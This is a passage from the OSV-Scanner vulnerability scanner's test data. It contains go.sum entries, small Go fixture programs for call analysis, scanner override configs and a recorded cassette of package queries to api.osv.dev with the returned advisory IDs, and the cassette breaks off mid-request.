h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/main.go 
================================================
package main

import (
	"log"
	"net/http"

	"github.com/gogo/protobuf/plugin/unmarshal"
	"github.com/gogo/protobuf/version"
	"github.com/ipfs/go-bitfield"
)

// main calls one function from each imported third-party package
// (version.AtLeast, unmarshal.NewUnmarshal, bitfield.NewBitfield) and then
// starts an HTTP server from the standard library.
// NOTE(review): judging by the testdata path, this file is scanner input for
// call analysis rather than a program meant to be run; confirm.
func main() {
	print(version.AtLeast("v1.2.3"))
	unmarshal.NewUnmarshal()
	bitfield.NewBitfield(14)

	// Test stdlib
	// A nil handler means http.DefaultServeMux is used. ":8080" has no host
	// part, so the listener is not limited to one interface, and this helper
	// configures no read or write timeouts.
	err := http.ListenAndServe(":8080", nil)
	// ListenAndServe only returns with a non-nil error, so this exits the
	// process whenever the server stops.
	if err != nil {
		log.Fatal(err)
	}
}
================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod
h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/main.go ================================================
package main

import (
	"log"
	"net/http"

	"github.com/gogo/protobuf/plugin/unmarshal"
	"github.com/gogo/protobuf/version"
)

// main calls version.AtLeast and unmarshal.NewUnmarshal from gogo/protobuf
// and then starts an HTTP server from the standard library.
// NOTE(review): the "all-uncalled" directory name suggests this is scanner
// input in which no vulnerable symbol is meant to be reachable; confirm
// against the snapshot that uses it.
func main() {
	print(version.AtLeast("v1.2.3"))
	unmarshal.NewUnmarshal()

	// Test stdlib
	// A nil handler means http.DefaultServeMux is used. ":8080" has no host
	// part, so the listener is not limited to one interface, and this helper
	// configures no read or write timeouts.
	err := http.ListenAndServe(":8080", nil)
	// ListenAndServe only returns with a non-nil error, so this exits the
	// process whenever the server stops.
	if err != nil {
		log.Fatal(err)
	}
}
================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 270 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/.gitignored_files url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist",
"name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_cyclonedx_1.4_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_cyclonedx_1.5_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_gh-annotations_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_sarif_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: 
Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_spdx_2.3_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 141 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Go_project_with_an_overridden_go_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2545 body: | { "results": [ { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": 
"2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] } ] } headers: Content-Length: - "2545" Content-Type: - application/json status: 200 OK code: 200 
duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 260 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Go_project_with_an_overridden_go_version,_recursive url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 5077 body: | { "results": [ { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": 
"2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": 
"GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { 
"id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] } ] } headers: Content-Length: - "5077" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 141 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Go_project_with_an_overridden_go_version_and_licences url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2545 body: | { "results": [ { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", 
"modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] } ] } headers: Content-Length: - "2545" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": 
"2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/PURL_SBOM_case_sensitivity_(api) url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 